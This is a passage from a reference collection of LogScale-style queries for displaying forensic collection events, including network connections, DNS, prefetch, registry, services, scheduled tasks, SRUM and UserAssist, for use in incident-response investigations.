#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkCloseIP4

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for RouteIP4

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

NetworkStatisticsIP4

#event_simpleName=NetworkStatisticsIP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, DefaultTTL, Forwarding, ForwDatagrams, FragCreates, FragOks, FragFails, InAddressErrors, InDelivers, InDiscards, InHeaderErrors, InReceives, InUnknownProtos, NumIPAddresses, NumInterfaces, NumRoutes, OutDiscards, OutNoRoutes, OutRequests, ReasmFails, ReasmOks, ReasmReqds, ReasmTimeout, RoutingDiscards], limit=max)

NetworkStatisticsTCP4

#event_simpleName=NetworkStatisticsTCP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, ActiveOpens, AttemptFails, CurrEstabConnections, EstabResets, InErrors, InSegs, MaxConnections, CurrentConnections, OutSegs, OutSegsResets, PassiveOpens, ReTxSegs, ReTxTimeOutAlgorithm, ReTxTimeOutMax, ReTxTimeOutMin], limit=max)

IPv6

Show all fields for LocalIpAddressIP6

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier, #event_simpleName, name], limit=max)

Show all fields for NetworkListenIP6

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkReceiveAcceptIP6

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkConnectIP6

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkCloseIP6

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for RouteIP6

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

NetworkStatisticsIP6

#event_simpleName=NetworkStatisticsIP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, DefaultTTL, Forwarding, ForwDatagrams, FragCreates, FragOks, FragFails, InAddressErrors, InDelivers, InDiscards, InHeaderErrors, InReceives, InUnknownProtos, NumIPAddresses, NumInterfaces, NumRoutes, OutDiscards, OutNoRoutes, OutRequests, ReasmFails, ReasmOks, ReasmReqds, ReasmTimeout, RoutingDiscards], limit=max)

NetworkStatisticsTCP6

#event_simpleName=NetworkStatisticsTCP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, ActiveOpens, AttemptFails, CurrEstabConnections, EstabResets, InErrors, InSegs, MaxConnections, CurrentConnections, OutSegs, OutSegsResets, PassiveOpens, ReTxSegs, ReTxTimeOutAlgorithm, ReTxTimeOutMax, ReTxTimeOutMin], limit=max)

DNS

Show all fields for DnsServer

#event_simpleName=DnsServer ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, ServerIP4Address, ServerIP6Address], limit=max)

Show all fields for NetworkDnsSuffix

#event_simpleName=NetworkDnsSuffix ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, DnsSuffix], limit=max)

Show all fields for DnsCache

#event_simpleName=DnsCache ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, RequestType, DomainName, ResourceTtl, FirstIp4Record, IP4Records, FirstIP6Record, IP6Records, CNAMERecords], limit=max)

ARP

Show all fields for NeighborListIP4

#event_simpleName=NeighborListIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, InterfaceIndex, NeighborList], limit=max)

Show all fields for NeighborListIP6

#event_simpleName=NeighborListIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, InterfaceIndex, NeighborList], limit=max)

UDP

NetworkStatisticsUDP4

#event_simpleName=NetworkStatisticsUDP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, InDatagrams, InErrors, NoPorts, NumUDPAddresses, OutDatagrams], limit=max)

NetworkStatisticsUDP6

#event_simpleName=NetworkStatisticsUDP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, InDatagrams, InErrors, NoPorts, NumUDPAddresses, OutDatagrams], limit=max)

Hosts File

Show all fields for NetworkHostsFileEntry

#event_simpleName=NetworkHostsFileEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, DomainName, RemoteAddressIP4, RemoteAddressIP6], limit=max)

PCA

Show all fields for PcaAppLaunchEntry

#event_simpleName=PcaAppLaunchEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, SourceFileName, Line, CommandLine, ImageFileName, FfcFileIdentifier], limit=max)

Show all fields for PcaGeneralDbEntry

#event_simpleName=PcaGeneralDbEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Line, SourceFileName, RuntimeStatus, RuntimeExitMessage, CommandLine, ImageFileName, FfcFileIdentifier, FileVerion, Description, AppVendor, ProgramUUID], limit=max)

PEInfo

Show all fields for PeHeaderInfo

#event_simpleName= PeHeaderInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, ModuleCharacteristics, ImageMachine, ImageNumberOfSections, ImageNumberOfSymbols, ImageSizeOfOptionalHeader, PeImageTimeStamp, FfcCollectionTag], limit=max)

Show all fields for PeHeaderOptionalInfo

#event_simpleName= PeHeaderOptionalInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, ImageEntryPoint, ImageBaseOfCode, PeImageBaseOfData, ImageCheckSum, DllCharacteristics, ImageFileAlignment, ImageBaseAddress, ImageLoaderFlags, ImageVersion, LinkerVersion, ImageOsVersion, ImageSubsystemVersion, ImageSectionAlignment, ImageSizeOfCode, ImageSizeOfHeaders, HeapCommit, HeapReserve, ImageSize, ImageSizeOfInitializedData, StackCommit, StackReserve, ImageSizeOfUninitializedData, ImageSubsystem, ImageWin32Version, FfcCollectionTag], limit=max)

Show all fields for PeSectionInfo

#event_simpleName= PeSectionInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, PeSectionName, PeSectionByteAlignment, PeSectionCharacteristics, PeSectionEntropy, FfcCollectionTag, PeSectionStartVirtAddress, PeSectionEndVirtAddress], limit=max)

Pipes

Show all fields for NamedPipe

#event_simpleName=NamedPipe ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NamedPipeName, NamedPipeAttributes, NamedPipeSizeBytes], limit=max)

Stack pipes by name

#event_simpleName=NamedPipe ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Groupby(NamedPipeName)

Prefetch

Show all fields for PrefetchFile

#event_simpleName=PrefetchFile ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, PrefetchAccessedFile, PrefetchPath, ImageInternalName, PrefetchRunCount], limit=max)

Show runs of cmd.exe by AID if you’ve done several collections, or you can change the groupBy to ForensicsCollectionIdentifier if you’d rather sort that way:

#event_simpleName=PrefetchFile ForensicsCollectionIdentifier=* ImageInternalName=CMD.EXE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | groupBy([aid], function=collect([PrefetchAccessedFile, PrefetchPath, PrefetchRunCount]))

PSList

Show all fields for ProcessRollup2

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime(format="%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, TargetProcessId, RawProcessId, ParentProcessId, SHA256HashData, SHA1HashData, MD5HashData, CommandLine, UserName, UserSid, UserSecurityDomain, WindowsProcessPriorityClass, SessionId, ProcessThreadInjectedStatus], limit=max)

Recentfiles

Recentfiles is now wrapped into the Dirlist related events, FileInfo, FileTimestampMetadata, and SignInfo. The queries in this section are the same queries found there.

Show All Fields for FileInfo

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, FileAttributes, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileOwnerSid, UserSid, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFileName, ProductName, ProductVersion], limit=max)

Show All Fields for FileTimestampMetadata

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileChangeType, FileAttributes, FfcFileIdentifier], limit=max)

Show All Fields for SignInfo

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MD5HashData, SHA1HashData, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

RecentExecutionTimestamp

Show all fields for RecentExecutionTimestamp

#event_simpleName=RecentExecutionTimestamp ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TimestampSourceType, ExecutablePath, UserSecurityDomain, UserSid, UserName, TargetFileName, FfcFileIdentifier, TaskSchedulerPath], limit=max)

Recycle

Show All Fields for FileDeleted

#event_simpleName=FileDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, SourceFileName, Size, UserSecurityDomain, UserName], limit=max)

Regdump

Show All Fields for RegGenericInfo

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%F %T", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

Count service DLLs

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* RegKeyName=CurrentControlSet RegValueName=servicedll | groupBy(RegKeyName, function=collect(RegValueName))

Accessibility Tools StartExe

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegObjectName = "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\" | RegKeyName = osk OR Narrator OR magnifierpane | RegValueName = StartExe | RegKeyLastWriteTime := formatTime("%Y-%m-%d %H:%M:%S") | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

You can remove the RegKeyName, and RegValueName pipes to see ALL accessibility reg. For example:

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegObjectName = "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\" | RegKeyLastWriteTime := formatTime("%Y-%m-%d %H:%M:%S") | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

Alternatively, you can take any RegKeyName and plug it in and get that specific tool. You can use OR, AND, NOT for arguments.

RegFeatureUsageInfo

Show all fields for ResourceShareInfo

#event_simpleName=RegFeatureUsageInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| KeyCreationTimeStamp := parseTimestamp(field="KeyCreationTimeStamp", format=seconds)
| KeyCreationTimestamp := formatTime("%F %T", field=KeyCreationTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, KeyCreationTimestamp, UserName, AppName, TargetFileName, FfcFileIdentifier, FeatureUsageCount, FeatureUsageType, FullRegKeyPath, UserSecurityDomain], limit=max)

Regfile

Show All Fields for RegGenericInfo

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%F %T", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

SDB

Show all fields for ShimDbTag

#event_simpleName=ShimDbTag ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SdbTagLocation, SdbTagLocationId, SdbTagSize, SdbTagType, SdbTagValueString], limit=max)

Services

Show all fields for ServiceStatusInfo

#event_simpleName=ServicesStatusInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ServiceDisplayName, ServiceType, ServiceStart, ServicePathUnquoted, ServiceCurrentState, ServiceStartType, ServiceTypeString, ServiceDisplayNameRegistry, ServiceDescription, ServiceRegLastWriteTime, ServiceObjectName, ServiceSid, ServiceIsWoW64, FfcServiceFlags, ErrorCode, TargetFileName, CommandLine, RawProcessId, FfcFileIdentifier], limit=max)

Show all fields for ResourceShareInfo

#event_simpleName=NetShareInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ShareName, ShareType, SharePermissions, ShareRemark, ShareCreatedFromCmdLine, SharePath, ShareTypeFlag], limit=max)

Shellbag

Show all fields for ShellBagInfo

#event_simpleName=ShellBagInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BagMruPath, FullRegKeyPath, BagEntryDescription, TargetFileName, BagPathType, FileAttributes, Size, BagEntryFlags, MftRecordId, MftSequenceNumber, BagEntryComment, UserName, UserSecurityDomain], limit=max)

Show all fields for ShellBagFileTimeStampMetadata

#event_simpleName=ShellBagFileTimeStampMetadata ForensicsCollectionIdentifier=* | time := ContextTimeStamp | time := formatTime("%Y-%m-%d %H:%M:%S", field=time) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, FfcFileChangeType, FileAttributes, FullRegKeyPath, PosixFileType], limit=max)

Shim

Show all fields for RegShimCache

#event_simpleName=RegShimCache ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, FfcFileIdentifier, TargetFileName, RegConfigIndex, ModifyTime, UpdateTime, ExecFlag, RegControlsetId, ShimEntries, ShimMagicCode, ShimSizeInBytes], limit=max)

StartupInfo

Show all fields for AutoRunProcessInfo

#event_simpleName=AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | ParentProcessStartTime := parseTimeStamp(field=ParentProcessStartTime, format=seconds) | ParentProcessStartTime := formatTime("%F %T", field=ParentProcessStartTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, FfcAutoRunType, ImageFileName, BundleId, CommandLineParameters, UserSid, UserName, UserSecurityDomain, StartupLogonNumber, TargetProcessId, ProcessCpuUsageMicroSec, ProcessDiskUsageBytes, ParentBaseFileName, ParentProcessId, ParentProcessStartTime, ProcessStartedInTraceSec], limit=max)

SRUM

Show all fields for SruApplicationResourceUsage

#event_simpleName=SruApplicationResourceUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppBackgroundBytesRead, AppBackgroundBytesWritten, AppBackgroundContextSwitches, AppBackgroundCycleTime, AppBackgroundNumberOfFlushes, AppBackgroundNumReadOperations, AppBackgroundNumWriteOperations, AppFaceTime, AppForegroundBytesRead, AppForegroundBytesWritten, AppForegroundContextSwitches, AppForegroundCycleTime, AppForegroundNumberOfFlushes, AppForegroundNumReadOperations, AppForegroundNumWriteOperations, UserSid], limit=max)

Show all fields for SruNetworkDataUsage

#event_simpleName=SruNetworkDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, NetworkBytesReceived, NetworkBytesSent, NetLuidIndex, NetworkProfileFlags, NetworkProfileIndex, UserSid], limit=max)

Show all fields for SruNetworkConnectivityUsage

#event_simpleName=SruApplicationTimelineProvider ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppConnectedTimeString, NetLuidIndex, NetworkProfileFlags, NetworkProfileIndex, UserSid, SrudbEntryCreationTimeStamp], limit=max)

Show all fields for SruApplicationTimelineProvider

#event_simpleName=SruApplicationTimelineProvider ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppAudioInSec, AppAudioInTimeline, AppAudioOutSec, AppAudioOutTimeline, AppCpuTimeline, AppDiskRaw, AppDiskTimeline, AppDisplayRequiredSec, AppDisplayRequiredTimeline, AppDurationMilliSec, AppEndTime, AppFlags, AppInFocusSec, AppInFocusTimeline, AppKeyboardInputSec, AppKeyboardInputTimeline, AppMouseInputSec, AppMBBBytesRaw, AppMBBTailRaw, AppMBBTimeline, AppNetworkBytesRaw, AppNetworkTailRaw, AppNetworkTimeline, AppUserInputSec, AppUserInputTimeline, AppTimelineEnd, UserSid], limit=max)

Superfetch

Show all fields for SuperfetchAppInfo

#event_simpleName=SuperfetchAppInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ImageFileName, SuperfetchAccessedFile, SuperfetchAppLaunchCount, SuperfetchAppForegroundCount], limit=max)

Show all fields for SuperfetchAppSchedule

#event_simpleName=SuperfetchAppSchedule ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ImageFileName, AppScheduleString], limit=max)

SysCache

Show all fields for SyscacheEntry

#event_simpleName=SyscacheEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SyscacheFileInUse, MftRecordId, MftSequenceNumber, ProgramUUID, SHA1HashData, USN, UsnJournalId], limit=max)

Tasks

Show all fields for ScheduledTaskInfo

#event_simpleName=ScheduledTaskInfo ForensicsCollectionIdentifier=* | TaskSchedulerRegisterDate := parseTimeStamp(field=TaskSchedulerRegisterDate, format=seconds) | TaskSchedulerRegisterDate := formatTime("%F %T", field=TaskSchedulerRegisterDate) | table([TaskSchedulerRegisterDate, aid, ForensicsCollectionIdentifier, TaskApiType, TaskSchedulerAllowDemandStart, TaskSchedulerAllowHardTerminate, TaskExecArguments, TaskAuthor, TaskSchedulerUserContext, TaskSchedulerTaskData, TaskSchedulerDeleteExpiredTaskAfter, Description, TaskSchedulerDisallowStartIfOnBatteries, TaskDisplayName, TaskDocumentation, TaskEnabled, TaskSchedulerExecId, ImageFileName, TaskSchedulerActionType, TaskSchedulerExecutionTimeLimit, TaskSchedulerLastTaskResult, TaskSchedulerGroupId, TaskSchedulerPrincipalType, TaskSchedulerHidden, TaskSchedulerLogonType, TaskName, TaskSchedulerNumberOfMissedRuns, TaskSchedulerPath, TaskSchedulerRestartCount, TaskSchedulerRestartInterval, TaskSchedulerRunLevel, TaskSchedulerRunOnlyIfIdle, TaskSchedulerRunOnlyIfNetworkAvailable, TaskSchedulerStartWhenAvailable, TaskSchedulerTaskState, TaskSchedulerStopIfGoingOnBatteries, TaskSchedulerTaskSource, URI, UserName, TaskSchedulerTaskVersion, TaskSchedulerWakeToRun, TaskPriority, TaskWorkingDirectory], limit=max)

Timeline

Show all fields for WindowsTimelineEntry

#event_simpleName=WindowsTimelineEntry| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ActivityId, SourceFileName, ParentActivityId, WindowsTimelineEntryActivityStatus, WindowsTimelineEntryActivityType, AppIdentificationData, JSONPayload, UserSecurityDomain, UserName, UserProfile, WindowsTimelineEntryPlatformDeviceId, WindowsTimelineEntryGroup, WindowsTimelineEntryTag], limit=max)

Show all fields for WindowsTimelineEntryTimestamp

#event_simpleName=WindowsTimelineEntryTimestamp | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ActivityId, WindowsTimelineEntryTimestampType], limit=max)

UAL

Show all fields for UserAccessLogEntry

#event_simpleName=UserAccessLogEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, SourceAccountUserName, UalServerRoleGuid, UalServerRoleName, UalTimeType, UalServerProductName, SourceEndpointAddressIP4, SourceEndpointAddressIP6, UalTotalAccesses, TargetFileName, FfcFileIdentifier, UalClientName], limit=max)

UserAssist

Show All Fields for UserAssistAppLaunchInfo

#event_simpleName=UserAssistAppLaunchInfo ForensicsCollectionIdentifier=* | UserAssistLastRunTimeStamp := parseTimeStamp(field=UserAssistLastRunTimeStamp, format=seconds) | UserAssistLastRunTimeStamp := formatTime("%F %T", field=UserAssistLastRunTimeStamp) | table([UserAssistLastRunTimeStamp, aid, ForensicsCollectionIdentifier, UserName, UserSecurityDomain, UserAssistMenuItem, UserAssistMenuFolder, UserAssistRegistryId, SessionId, UserAssistLaunchCount], limit=max)

USB

Show all fields for UsbDeviceInfo

